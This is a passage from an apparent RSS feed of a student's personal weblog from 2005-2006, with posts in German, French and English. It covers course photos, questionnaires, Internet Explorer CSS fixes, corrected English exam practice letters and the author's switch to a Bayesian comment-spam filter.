  9176. <p>Voil&#224; quelques images de la s&#233;ance d'exercices du <a href="" title="Lecture Software Engineering, EPFL, Winter 2005/06 (">cours du g&#233;nie logiciel</a>.</p>
  9177. <br><br>
  9178. <dl class="tdl">
  9179. <dt><a href=""><img src="" alt="images/dsc01443_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9180. <dd class="tdlb"></dd>
  9181. <dt><a href=""><img src="" alt="images/dsc01446_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9182. <dd class="tdlb"></dd>
  9183. <dt><a href=""><img src="" alt="images/dsc01447_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9184. <dd class="tdlb"></dd>
  9185. <dt><a href=""><img src="" alt="images/dsc01448_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9186. <dd class="tdlb"></dd>
  9187. <dt><a href=""><img src="" alt="images/dsc01449_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9188. <dd class="tdlb"></dd>
  9189. <dt><a href=""><img src="" alt="images/dsc01450_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9190. <dd class="tdlb"></dd>
  9191. <dt><a href=""><img src="" alt="images/dsc01451_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9192. <dd class="tdlb"></dd>
  9193. <dt><a href=""><img src="" alt="images/dsc01452_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9194. <dd class="tdlb"></dd>
  9195. <dt><a href=""><img src="" alt="images/dsc01453_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9196. <dd class="tdlb"></dd>
  9197. <dt><a href=""><img src="" alt="images/dsc01454_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9198. <dd class="tdlb"></dd>
  9199. <dt><a href=""><img src="" alt="images/dsc01455_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9200. <dd class="tdlb"></dd>
  9201. <dt><a href=""><img src="" alt="images/dsc01456_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9202. <dd class="tdlb"></dd>
  9203. <dt><a href=""><img src="" alt="images/dsc01457_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9204. <dd class="tdlb"></dd>
  9205. <dt><a href=""><img src="" alt="images/dsc01458_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9206. <dd class="tdlb"></dd>
  9207. <dt><a href=""><img src="" alt="images/dsc01459_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9208. <dd class="tdlb"></dd>
  9209. <dt><a href=""><img src="" alt="images/dsc01460_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9210. <dd class="tdlb"></dd>
  9211. <dt><a href=""><img src="" alt="images/dsc01461_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9212. <dd class="tdlb"></dd>
  9213. <dt><a href=""><img src="" alt="images/dsc01463_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9214. <dd class="tdlb"></dd>
  9215. </dl>
  9217. ]]></description>
  9218.    <content:encoded><![CDATA[<dl class="tdl">
  9219. <dt><a href=""><img src="" style="height: 75px; width: 100px;" alt="dsc01442_thumb.jpg"></a></dt>
  9220. <dd class="tdlb"></dd>
  9221. </dl>
  9222. <p>Voil&#224; quelques images de la s&#233;ance d'exercices du <a href="" title="Lecture Software Engineering, EPFL, Winter 2005/06 (">cours du g&#233;nie logiciel</a>.</p>
  9223. <br><br>
  9224. <dl class="tdl">
  9225. <dt><a href=""><img src="" alt="images/dsc01443_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9226. <dd class="tdlb"></dd>
  9227. <dt><a href=""><img src="" alt="images/dsc01446_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9228. <dd class="tdlb"></dd>
  9229. <dt><a href=""><img src="" alt="images/dsc01447_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9230. <dd class="tdlb"></dd>
  9231. <dt><a href=""><img src="" alt="images/dsc01448_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9232. <dd class="tdlb"></dd>
  9233. <dt><a href=""><img src="" alt="images/dsc01449_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9234. <dd class="tdlb"></dd>
  9235. <dt><a href=""><img src="" alt="images/dsc01450_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9236. <dd class="tdlb"></dd>
  9237. <dt><a href=""><img src="" alt="images/dsc01451_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9238. <dd class="tdlb"></dd>
  9239. <dt><a href=""><img src="" alt="images/dsc01452_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9240. <dd class="tdlb"></dd>
  9241. <dt><a href=""><img src="" alt="images/dsc01453_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9242. <dd class="tdlb"></dd>
  9243. <dt><a href=""><img src="" alt="images/dsc01454_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9244. <dd class="tdlb"></dd>
  9245. <dt><a href=""><img src="" alt="images/dsc01455_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9246. <dd class="tdlb"></dd>
  9247. <dt><a href=""><img src="" alt="images/dsc01456_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9248. <dd class="tdlb"></dd>
  9249. <dt><a href=""><img src="" alt="images/dsc01457_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9250. <dd class="tdlb"></dd>
  9251. <dt><a href=""><img src="" alt="images/dsc01458_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9252. <dd class="tdlb"></dd>
  9253. <dt><a href=""><img src="" alt="images/dsc01459_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9254. <dd class="tdlb"></dd>
  9255. <dt><a href=""><img src="" alt="images/dsc01460_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9256. <dd class="tdlb"></dd>
  9257. <dt><a href=""><img src="" alt="images/dsc01461_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9258. <dd class="tdlb"></dd>
  9259. <dt><a href=""><img src="" alt="images/dsc01463_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  9260. <dd class="tdlb"></dd>
  9261. </dl>
  9263. ]]></content:encoded>
  9264.  </item>
  9266.  <item>
  9267.    <title>Die fünf unabhängigen Fragen zum Freitag</title>
  9268.    <link></link>
  9269.    <guid isPermaLink="true"></guid>
  9270.    <dc:creator>Andreas Jaggi</dc:creator>
  9271.    <creativeCommons:license></creativeCommons:license>
  9272.    <pubDate>Fri, 06 Jan 2006 02:18:34 +0100</pubDate>
  9273.    <category domain="">Misc</category>
  9274.    <description><![CDATA[<p>Nachdem ich es letzte Woche verpennt habe, gibt&#8217;s hier nun die beantworteten <a href="" title="Die fünf unabhängigen Fragen zum Freitag (">Fragen</a> dieser Woche:</p>
  9276. <ol>
  9277. <li>
  9278. <p>
  9279. <q>Schneiden wir mal ein heikles Thema an. Wie vertreibst Du Dir die
  9280. Zeit auf dem Thron? Gibt&#8217;s Toilettenliteratur, die Tageszeitung, Musik?</q>
  9281. </p>
  9282. <p>
  9283. Meistens hängen meine Gedanken bei irgendeiner Arbeit die ich gerade mache und so nutze ich die Zeit um neue Ideen zu sammeln.
  9284. </p>
  9285. </li>
  9287. <li>
  9288. <p>
  9289. <q>Wenn Du jetzt aus dem nächstgelegenen Fenster schaust. Was stört Dich am ehesten?</q>
  9290. </p>
  9291. <p>
  9292. Hm, weil&#8217;s Nacht ist sehe ich nicht sehr viel und von dem was ich sehe stört mich momentan eigentlich nichts.
  9293. </p>
  9294. </li>
  9296. <li>
  9297. <p>
  9298. <q>Jetzt wird&#8217;s intim. Hast Du einen Fernseher im Schlafzimmer? Und warum hast Du dort (k)einen?</q>
  9299. </p>
  9300. <p>
  9301. Ich habe gar keinen Fernseher.
  9302. </p>
  9303. </li>
  9305. <li>
  9306. <p>
  9307. <q>In jedem dritten Weblog kann man über Moleskines lesen. Jene
  9308. neckischen Notizbücher, die es in diverstesten Formen gibt. Wie
  9309. organisierst Du Dich? Machst Du schriftliche Notizen, oder reizt Du den
  9310. naturgegebenen Speicher voll aus. Wie vewaltest Du Deine Telefonnummern
  9311. und Kontakte?</q>
  9312. </p>
  9313. <p>
  9314. Meistens versuche ich alles im Kopf zu behalten, was auch ziemlich gut
  9315. klappt. Telefonnummern sind im Handy gespeichert und E-Mail Adressen im
  9316. Adressbuch vom E-Mail Programm. Postadressen hingegen nirgends, da ich
  9317. sie nie brauche.
  9318. </p>
  9319. </li>
  9321. <li>
  9322. <p>
  9323. <q>Has(s)t Du Stofftiere?</q>
  9324. </p>
  9325. <p>
  9326. Ich habe ein Stofftier und zwar <a href="" title="Mein Stofftier">dieses hier</a>.
  9327. </p>
  9328. </li>
  9329. </ol>
  9330. ]]></description>
  9331.    <content:encoded><![CDATA[<p>Nachdem ich es letzte Woche verpennt habe, gibt&#8217;s hier nun die beantworteten <a href="" title="Die fünf unabhängigen Fragen zum Freitag (">Fragen</a> dieser Woche:</p>
  9333. <ol>
  9334. <li>
  9335. <p>
  9336. <q>Schneiden wir mal ein heikles Thema an. Wie vertreibst Du Dir die
  9337. Zeit auf dem Thron? Gibt&#8217;s Toilettenliteratur, die Tageszeitung, Musik?</q>
  9338. </p>
  9339. <p>
  9340. Meistens hängen meine Gedanken bei irgendeiner Arbeit die ich gerade mache und so nutze ich die Zeit um neue Ideen zu sammeln.
  9341. </p>
  9342. </li>
  9344. <li>
  9345. <p>
  9346. <q>Wenn Du jetzt aus dem nächstgelegenen Fenster schaust. Was stört Dich am ehesten?</q>
  9347. </p>
  9348. <p>
  9349. Hm, weil&#8217;s Nacht ist sehe ich nicht sehr viel und von dem was ich sehe stört mich momentan eigentlich nichts.
  9350. </p>
  9351. </li>
  9353. <li>
  9354. <p>
  9355. <q>Jetzt wird&#8217;s intim. Hast Du einen Fernseher im Schlafzimmer? Und warum hast Du dort (k)einen?</q>
  9356. </p>
  9357. <p>
  9358. Ich habe gar keinen Fernseher.
  9359. </p>
  9360. </li>
  9362. <li>
  9363. <p>
  9364. <q>In jedem dritten Weblog kann man über Moleskines lesen. Jene
  9365. neckischen Notizbücher, die es in diverstesten Formen gibt. Wie
  9366. organisierst Du Dich? Machst Du schriftliche Notizen, oder reizt Du den
  9367. naturgegebenen Speicher voll aus. Wie vewaltest Du Deine Telefonnummern
  9368. und Kontakte?</q>
  9369. </p>
  9370. <p>
  9371. Meistens versuche ich alles im Kopf zu behalten, was auch ziemlich gut
  9372. klappt. Telefonnummern sind im Handy gespeichert und E-Mail Adressen im
  9373. Adressbuch vom E-Mail Programm. Postadressen hingegen nirgends, da ich
  9374. sie nie brauche.
  9375. </p>
  9376. </li>
  9378. <li>
  9379. <p>
  9380. <q>Has(s)t Du Stofftiere?</q>
  9381. </p>
  9382. <p>
  9383. Ich habe ein Stofftier und zwar <a href="" title="Mein Stofftier">dieses hier</a>.
  9384. </p>
  9385. </li>
  9386. </ol>
  9387. ]]></content:encoded>
  9388.  </item>
  9390.  <item>
  9391.    <title>Fünf weihnachtliche Fragen</title>
  9392.    <link></link>
  9393.    <guid isPermaLink="true"></guid>
  9394.    <dc:creator>Andreas Jaggi</dc:creator>
  9395.    <creativeCommons:license></creativeCommons:license>
  9396.    <pubDate>Sun, 25 Dec 2005 18:03:01 +0100</pubDate>
  9397.    <category domain="">Misc</category>
  9398.    <description><![CDATA[<p>
  9399. <a href="" title="deep-resonance.">Markus</a> stellt fünf weihnachtliche Fragen:
  9400. </p>
  9402. <blockquote cite="">
  9403. <ol>
  9404. <li>Und? Schon alle Geschenke gekauft? Auch schon verpackt? </li>
  9406. <li>Hand auf&#8217;s Herz. Ist das Geschenkekaufen ein Pflichtprogramm oder gibst Du Dir Mühe was &#8220;passendes&#8221; zu finden? </li>
  9408. <li>Weihnachten
  9409. das Familienfest. Verbringst Du Weihnachten mit der Familie? Aus
  9410. Tradition? Weil man sich sonst nie sieht? Wird&#8217;s Zoff geben? Oder ist
  9411. Dir das alles zu spie&#223;ig?</li>
  9413. <li>Hast Du überhaupt Lust auf
  9414. Weihnachten? Oder versinkst Du lieber in eine Winterdepression oder
  9415. ergibst Du Dich an den ruhigen Tagen Deinem Weltschmerz? </li>
  9417. <li>Urlaub?
  9418. Na, zwischen den Feiertagen Urlaub genommen? Oder bist Du froh, wenn Du
  9419. Dich fern der Familie bei der Knechterei verstecken kannst? </li>
  9420. </ol>
  9421. </blockquote>
  9423. <p>
  9424. Und hier meine Antworten:
  9425. </p>
  9426. <ol>
  9427. <li>Ich habe alle Geschenke schon gekauft, aber nur die für Gestern sind schon verpackt.</li>
  9429. <li>Geschenke versuche ich immer passende zu finden, was sich allerdings nicht immer als leicht herausstellt.</li>
  9431. <li>Weihnachten verbringe ich mit der Familie; aus Tradition und auch weil ich sie in letzter Zeit nicht sehr viel gesehen habe.</li>
  9433. <li>Lust auf Weihnachten? k.A.</li>
  9435. <li>Ich habe zwei Wochen unterrichtsfreie Zeit, habe aber soviel Arbeit mitbekommen, dass ich nicht wirklich ausspannen kann.</li>
  9436. </ol>
  9438. <p>&nbsp;</p>
  9439. ]]></description>
  9440.    <content:encoded><![CDATA[<p>
  9441. <a href="" title="deep-resonance.">Markus</a> stellt fünf weihnachtliche Fragen:
  9442. </p>
  9444. <blockquote cite="">
  9445. <ol>
  9446. <li>Und? Schon alle Geschenke gekauft? Auch schon verpackt? </li>
  9448. <li>Hand auf&#8217;s Herz. Ist das Geschenkekaufen ein Pflichtprogramm oder gibst Du Dir Mühe was &#8220;passendes&#8221; zu finden? </li>
  9450. <li>Weihnachten
  9451. das Familienfest. Verbringst Du Weihnachten mit der Familie? Aus
  9452. Tradition? Weil man sich sonst nie sieht? Wird&#8217;s Zoff geben? Oder ist
  9453. Dir das alles zu spie&#223;ig?</li>
  9455. <li>Hast Du überhaupt Lust auf
  9456. Weihnachten? Oder versinkst Du lieber in eine Winterdepression oder
  9457. ergibst Du Dich an den ruhigen Tagen Deinem Weltschmerz? </li>
  9459. <li>Urlaub?
  9460. Na, zwischen den Feiertagen Urlaub genommen? Oder bist Du froh, wenn Du
  9461. Dich fern der Familie bei der Knechterei verstecken kannst? </li>
  9462. </ol>
  9463. </blockquote>
  9465. <p>
  9466. Und hier meine Antworten:
  9467. </p>
  9468. <ol>
  9469. <li>Ich habe alle Geschenke schon gekauft, aber nur die für Gestern sind schon verpackt.</li>
  9471. <li>Geschenke versuche ich immer passende zu finden, was sich allerdings nicht immer als leicht herausstellt.</li>
  9473. <li>Weihnachten verbringe ich mit der Familie; aus Tradition und auch weil ich sie in letzter Zeit nicht sehr viel gesehen habe.</li>
  9475. <li>Lust auf Weihnachten? k.A.</li>
  9477. <li>Ich habe zwei Wochen unterrichtsfreie Zeit, habe aber soviel Arbeit mitbekommen, dass ich nicht wirklich ausspannen kann.</li>
  9478. </ol>
  9480. <p>&nbsp;</p>
  9481. ]]></content:encoded>
  9482.  </item>
  9484.  <item>
  9485.    <title>Best Blonde Joke Ever</title>
  9486.    <link></link>
  9487.    <guid isPermaLink="true"></guid>
  9488.    <dc:creator>Andreas Jaggi</dc:creator>
  9489.    <creativeCommons:license></creativeCommons:license>
  9490.    <pubDate>Sat, 24 Dec 2005 14:45:26 +0100</pubDate>
  9491.    <category domain="">Misc</category>
  9492.    <description><![CDATA[<p>There is it, the <a href="" title="vowe dot net :: Best. Blonde. Joke. Ever.">best blonde joke ever</a>.</p>
  9493. ]]></description>
  9494.    <content:encoded><![CDATA[<p>There is it, the <a href="" title="vowe dot net :: Best. Blonde. Joke. Ever.">best blonde joke ever</a>.</p>
  9495. ]]></content:encoded>
  9496.  </item>
  9498.  <item>
  9499.    <title>Schnee</title>
  9500.    <link></link>
  9501.    <guid isPermaLink="true"></guid>
  9502.    <dc:creator>Andreas Jaggi</dc:creator>
  9503.    <creativeCommons:license></creativeCommons:license>
  9504.    <pubDate>Sun, 18 Dec 2005 23:46:24 +0100</pubDate>
  9505.    <category domain="">Misc</category>
  9506.    <description><![CDATA[<p>
  9507. <a href="" title="Klick um das ganze Bild anzuzeigen"><img width="249" height="179" src="" alt="Schnee (Ausschnitt)"></a>
  9508. </p>
  9510. <p>
  9511. Blick aus meinem Fenster, heute um 11:28 Uhr.<br>
  9512. Danach gings ab auf die Piste :-)
  9513. </p>
  9514. ]]></description>
  9515.    <content:encoded><![CDATA[<p>
  9516. <a href="" title="Klick um das ganze Bild anzuzeigen"><img width="249" height="179" src="" alt="Schnee (Ausschnitt)"></a>
  9517. </p>
  9519. <p>
  9520. Blick aus meinem Fenster, heute um 11:28 Uhr.<br>
  9521. Danach gings ab auf die Piste :-)
  9522. </p>
  9523. ]]></content:encoded>
  9524.  </item>
  9526.  <item>
  9527.    <title>CSS4IE</title>
  9528.    <link></link>
  9529.    <guid isPermaLink="true"></guid>
  9530.    <dc:creator>Andreas Jaggi</dc:creator>
  9531.    <creativeCommons:license></creativeCommons:license>
  9532.    <pubDate>Wed, 23 Nov 2005 01:21:59 +0100</pubDate>
  9533.    <category domain="">Webdesign</category>
  9534.    <description><![CDATA[<p>Da hier anscheinend doch machmal ein paar Benutzer mit dem Internet
  9535. Explorer vorbeikommen habe ich nun doch noch das Layout so angepasst,
  9536. dass es auch im Internet Explorer wie gewünscht aussieht (zudem soll ja
  9537. eine potentielle Kundschaft nicht abgeschreckt
  9538. werden).</p>
  9539. <p>
  9540. Eigentlich sind die Änderungen am CSS nur ganz klein, aber umso schwerer herauszufinden *grrr*.<br>
  9541. Als sehr hilfreich herausgestellt hat sich die parallele Installation verschiedener Internet Explorer Versionen. <a href="" title="Multiple Explorers (">Dieser Artikel</a> erklärt wie man eine solche Testumgebung erstellt.</p>
  9542. <p>
  9543. Interessanterweise sah der unangepasste Stylesheet im Internet Explorer 4 bedeutend besser aus als im Internet Explorer 5, 5.5 oder 6.</p>
  9544. ]]></description>
  9545.    <content:encoded><![CDATA[<p>Da hier anscheinend doch machmal ein paar Benutzer mit dem Internet
  9546. Explorer vorbeikommen habe ich nun doch noch das Layout so angepasst,
  9547. dass es auch im Internet Explorer wie gewünscht aussieht (zudem soll ja
  9548. eine potentielle Kundschaft nicht abgeschreckt
  9549. werden).</p>
  9550. <p>
  9551. Eigentlich sind die Änderungen am CSS nur ganz klein, aber umso schwerer herauszufinden *grrr*.<br>
  9552. Als sehr hilfreich herausgestellt hat sich die parallele Installation verschiedener Internet Explorer Versionen. <a href="" title="Multiple Explorers (">Dieser Artikel</a> erklärt wie man eine solche Testumgebung erstellt.</p>
  9553. <p>
  9554. Interessanterweise sah der unangepasste Stylesheet im Internet Explorer 4 bedeutend besser aus als im Internet Explorer 5, 5.5 oder 6.</p>
  9555. ]]></content:encoded>
  9556.  </item>
  9558.  <item>
  9559.    <title>FCE Formal Letter #1</title>
  9560.    <link></link>
  9561.    <guid isPermaLink="true"></guid>
  9562.    <dc:creator>Andreas Jaggi</dc:creator>
  9563.    <creativeCommons:license></creativeCommons:license>
  9564.    <pubDate>Tue, 22 Nov 2005 21:39:44 +0100</pubDate>
  9565.    <category domain="">School</category>
  9566.    <description><![CDATA[<p>Here's the letter we had to write for this week. In fact it's not
  9567. totaly written by myself because about 40% of the letter were already
  9568. given and we just had to complete it.<br>
  9569. Since we had to do this letter for today, it's not yet corrected.</p>
  9570. <br><br>
  9571. <blockquote class="fce-formal-letter">
  9572. <p>Dear Mr Spiller,</p>
  9574. <p>Thank you very much for your letter informing me that I have won
  9575. first prize in the competition. I am looking forward to going to
  9576. Australia and attending the course.</p>
  9578. <p>I would like to do the course in August because in September my courses at the EPFL start.</p>
  9580. <p>In the morning, I would like to join a grammar and vocabulary class
  9581. because I asume my skills in these fields could use an improvement.<br>
  9582. In
  9583. the afternoon, I would like to try making a class website because I was
  9584. always fascinated by the possibilities of the internet and would like
  9585. to create a part of it on my own. I would also be interested in trying
  9586. to make a radio programme because I often listen to the radio and like
  9587. it a lot.</p>
  9589. <p>Could you tell me what type of accommmodation is provided and what kind of clothes I should bring with me?</p>
  9591. <p>I look forward to hearing from you.</p>
  9593. <p>Yours sincerely,</p>
  9595. <p>Andreas Jaggi</p>
  9596. </blockquote>
  9597. ]]></description>
  9598.    <content:encoded><![CDATA[<p>Here's the letter we had to write for this week. In fact it's not
  9599. totaly written by myself because about 40% of the letter were already
  9600. given and we just had to complete it.<br>
  9601. Since we had to do this letter for today, it's not yet corrected.</p>
  9602. <br><br>
  9603. <blockquote class="fce-formal-letter">
  9604. <p>Dear Mr Spiller,</p>
  9606. <p>Thank you very much for your letter informing me that I have won
  9607. first prize in the competition. I am looking forward to going to
  9608. Australia and attending the course.</p>
  9610. <p>I would like to do the course in August because in September my courses at the EPFL start.</p>
  9612. <p>In the morning, I would like to join a grammar and vocabulary class
  9613. because I asume my skills in these fields could use an improvement.<br>
  9614. In
  9615. the afternoon, I would like to try making a class website because I was
  9616. always fascinated by the possibilities of the internet and would like
  9617. to create a part of it on my own. I would also be interested in trying
  9618. to make a radio programme because I often listen to the radio and like
  9619. it a lot.</p>
  9621. <p>Could you tell me what type of accommmodation is provided and what kind of clothes I should bring with me?</p>
  9623. <p>I look forward to hearing from you.</p>
  9625. <p>Yours sincerely,</p>
  9627. <p>Andreas Jaggi</p>
  9628. </blockquote>
  9629. ]]></content:encoded>
  9630.  </item>
  9632.  <item>
  9633.    <title>FCE Informal Letter #2</title>
  9634.    <link></link>
  9635.    <guid isPermaLink="true"></guid>
  9636.    <dc:creator>Andreas Jaggi</dc:creator>
  9637.    <creativeCommons:license></creativeCommons:license>
  9638.    <pubDate>Sun, 20 Nov 2005 01:07:51 +0100</pubDate>
  9639.    <category domain="">School</category>
  9640.    <description><![CDATA[<p>To continue what I started on Friday: here is the second letter I
  9641. wrote for the English course. I got back this letter last Thursday, so
  9642. it comes already with the corrections, but I plan to publish the next
  9643. letters before I hand them in and to add the corrections afterwards.</p>
  9644. <br><br>
  9645. <blockquote class="fce-informal-letter">
  9646. <p class="fce-informal-letter-no-indent">Dear Roman,</p>
  9647. <p>
  9648. You asked me for advice regarding next term. Here is the information I gathered for you.
  9649. </p>
  9650. <p>
  9651. The course registration is on Monday 6 September and Tuesday 7
  9652. September from 10.00 to 16.00. Register as early as possible because
  9653. there are really <del>much</del><ins>many</ins> people. There is always a big queue, but it is worth it.
  9654. </p>
  9655. <p>
  9656. Also on Tuesday but at 9.00 the College bookshop opens. You need all the books by Wednesday.<br>
  9657. At the bookshop they cost <del>50 pounds</del><ins>&#163;50</ins>, but you can have mine for half price<ins>, great bargain!!</ins>.
  9658. </p>
  9659. <p>
  9660. The first lesson starts on Wednesday 8 September at 9.15. It is always good to be there early (9.00) so you have a good seat.
  9661. </p>
  9662. <p>
  9663. On Wednesday evening there is a welcome party at 20.00 at Seven Starts
  9664. Hotel, it is always a great fun. Maybe we will meet there?
  9665. </p>
  9666. <p class="fce-informal-letter-no-indent">See you there</p>
  9667. <p class="fce-informal-letter-no-indent">Yours<br>Andreas</p>
  9668. </blockquote>
  9669. ]]></description>
  9670.    <content:encoded><![CDATA[<p>To continue what I started on Friday: here is the second letter I
  9671. wrote for the English course. I got back this letter last Thursday, so
  9672. it comes already with the corrections, but I plan to publish the next
  9673. letters before I hand them in and to add the corrections afterwards.</p>
  9674. <br><br>
  9675. <blockquote class="fce-informal-letter">
  9676. <p class="fce-informal-letter-no-indent">Dear Roman,</p>
  9677. <p>
  9678. You asked me for advice regarding next term. Here is the information I gathered for you.
  9679. </p>
  9680. <p>
  9681. The course registration is on Monday 6 September and Tuesday 7
  9682. September from 10.00 to 16.00. Register as early as possible because
  9683. there are really <del>much</del><ins>many</ins> people. There is always a big queue, but it is worth it.
  9684. </p>
  9685. <p>
  9686. Also on Tuesday but at 9.00 the College bookshop opens. You need all the books by Wednesday.<br>
  9687. At the bookshop they cost <del>50 pounds</del><ins>&#163;50</ins>, but you can have mine for half price<ins>, great bargain!!</ins>.
  9688. </p>
  9689. <p>
  9690. The first lesson starts on Wednesday 8 September at 9.15. It is always good to be there early (9.00) so you have a good seat.
  9691. </p>
  9692. <p>
  9693. On Wednesday evening there is a welcome party at 20.00 at Seven Starts
  9694. Hotel, it is always a great fun. Maybe we will meet there?
  9695. </p>
  9696. <p class="fce-informal-letter-no-indent">See you there</p>
  9697. <p class="fce-informal-letter-no-indent">Yours<br>Andreas</p>
  9698. </blockquote>
  9699. ]]></content:encoded>
  9700.  </item>
  9702.  <item>
  9703.    <title>Kommentar Spam</title>
  9704.    <link></link>
  9705.    <guid isPermaLink="true"></guid>
  9706.    <dc:creator>Andreas Jaggi</dc:creator>
  9707.    <creativeCommons:license></creativeCommons:license>
  9708.    <pubDate>Sun, 20 Nov 2005 00:07:22 +0100</pubDate>
  9709.    <category domain="">Coding</category>
  9710.    <description><![CDATA[<p>Seit gestern haben hier die Spam-Kommentare massiv zugenommmen
  9711. (sprich 40-50 anstelle von 0-10 pro Tag). Zudem werden sie nicht mehr
  9712. über den ganzen Tag verteilt abgegeben sondern fast alle innerhalb der
  9713. gleichen 5-10 Minuten.</p>
  9715. <p>Glücklicherweise habe ich schon vor einiger Zeit meinen <a href="" title="x-log: Fight Spam">&quot;naiven&quot; Badword-Filter</a> durch einen <a href="" title="Bayesscher Filter - Wikipedia">Bayes'schen Spamfilter</a> ersetzt, der bisher alle(!) Spam-Kommentare erkannt und markiert hat.
  9716. <br>
  9717. Aber es ist trotzdem ärgerlich immer die als Spam markierten
  9718. Kommentare zu löschen (momentant habe ich noch nicht genügend Vertrauen
  9719. in den Filter als dass ich ihn die Spam-Kommentare automatisch löschen
  9720. lasse).</p>
  9722. <p>Da die Anzahl der hier vorhandenen Kommentare nicht gerade enorm
  9723. ist, habe ich um den Spamfilter zu trainieren auch noch die Seiten
  9724. meines <a href="" title="x-log:">spamgeplagten</a> <a href="" title="">Wikis</a> hinzugenommen. Auch dort funktioniert die Spamerkennung nach anfänglichen Schwierigkeiten (False-positives) problemlos.</p>
  9726. <p>
  9727. Dieses &quot;Wundermittel gegen den Spam&quot; habe ich nicht etwa selber entwickelt sondern ich habe einfach die <a href="" title="PHP Classes - Class: Spam Filter">Spam Filter Klasse</a> von <a href="" title="PHP Classes"></a> an meine Bedürfnisse angepasst.<br>
  9728. Allen Spamgeplagten kann ich den Einsatz eines <a href="" title="Bayesscher Filter - Wikipedia">Bayes'schen Spamfilters</a> sehr empfehlen!
  9729. </p>
  9730. ]]></description>
  9731.    <content:encoded><![CDATA[<p>Seit gestern haben hier die Spam-Kommentare massiv zugenommmen
  9732. (sprich 40-50 anstelle von 0-10 pro Tag). Zudem werden sie nicht mehr
  9733. über den ganzen Tag verteilt abgegeben sondern fast alle innerhalb der
  9734. gleichen 5-10 Minuten.</p>
  9736. <p>Glücklicherweise habe ich schon vor einiger Zeit meinen <a href="" title="x-log: Fight Spam">&quot;naiven&quot; Badword-Filter</a> durch einen <a href="" title="Bayesscher Filter - Wikipedia">Bayes'schen Spamfilter</a> ersetzt, der bisher alle(!) Spam-Kommentare erkannt und markiert hat.
  9737. <br>
  9738. Aber es ist trotzdem ärgerlich immer die als Spam markierten
  9739. Kommentare zu löschen (momentant habe ich noch nicht genügend Vertrauen
  9740. in den Filter als dass ich ihn die Spam-Kommentare automatisch löschen
  9741. lasse).</p>
  9743. <p>Da die Anzahl der hier vorhandenen Kommentare nicht gerade enorm
  9744. ist, habe ich um den Spamfilter zu trainieren auch noch die Seiten
  9745. meines <a href="" title="x-log:">spamgeplagten</a> <a href="" title="">Wikis</a> hinzugenommen. Auch dort funktioniert die Spamerkennung nach anfänglichen Schwierigkeiten (False-positives) problemlos.</p>
  9747. <p>
  9748. Dieses &quot;Wundermittel gegen den Spam&quot; habe ich nicht etwa selber entwickelt sondern ich habe einfach die <a href="" title="PHP Classes - Class: Spam Filter">Spam Filter Klasse</a> von <a href="" title="PHP Classes"></a> an meine Bedürfnisse angepasst.<br>
  9749. Allen Spamgeplagten kann ich den Einsatz eines <a href="" title="Bayesscher Filter - Wikipedia">Bayes'schen Spamfilters</a> sehr empfehlen!
  9750. </p>
  9751. ]]></content:encoded>
  9752.  </item>
  9754.  <item>
  9755.    <title>FCE</title>
  9756.    <link></link>
  9757.    <guid isPermaLink="true"></guid>
  9758.    <dc:creator>Andreas Jaggi</dc:creator>
  9759.    <creativeCommons:license></creativeCommons:license>
  9760.    <pubDate>Thu, 17 Nov 2005 23:39:12 +0100</pubDate>
  9761.    <category domain="">School</category>
  9762.    <description><![CDATA[<p>
  9763. Since I didn't have English courses for almost five years and since I
  9764. plan to do an exchange year in 2006/2007, I'm actually following an
  9765. English preparation course for the Cambridge First Certificate in
  9766. English (FCE) with the target to do the certificate in July 2006.<br>The course is hold at the language center of the EPFL and is also paid by the EPFL (only the course, not the certificate).</p>
  9767. <p>
  9768. It seems that for the course I have to write a sample letter each week.
  9769. I thought this would be a good oppurtunity to easily add some English
  9770. content to this weblog and this way there are much more people who can
  9771. find mistakes and eventually give me some hints on how to improve my
  9772. writing skills :-)
  9773. </p>
  9774. <p>
  9775. There we go, here is the first letter we had to write, already with the corrections.
  9776. </p>
  9777. <br><br>
  9778. <blockquote>
  9779. <p>Dear Thomas,</p>
  9780. <p>
  9781. <del>Like</del><ins>As</ins> you probably know, I help at <ins>the</ins> &quot;Satellite&quot; and we're organizing a concert tomorrow.<br>
  9782. It's a concert <del>of</del><ins>with</ins> two post-rock groups called &quot;Rosqo&quot; and &quot;Beautiful Leopard&quot;.
  9783. </p>
  9784. <p>
  9785. &quot;Satellite&quot; is located on the second floor of the &quot;CM&quot; building of <ins>the</ins> EPFL. The concert starts at eight o'clock and finishes around midnight.
  9786. </p>
  9787. <p>
  9788. It seems that the two groups are quite popular, so please tell me if you can come as <del>fast</del><ins>soon</ins> as possible, so that I can reserve a ticket for you.
  9789. </p>
  9790. <p>
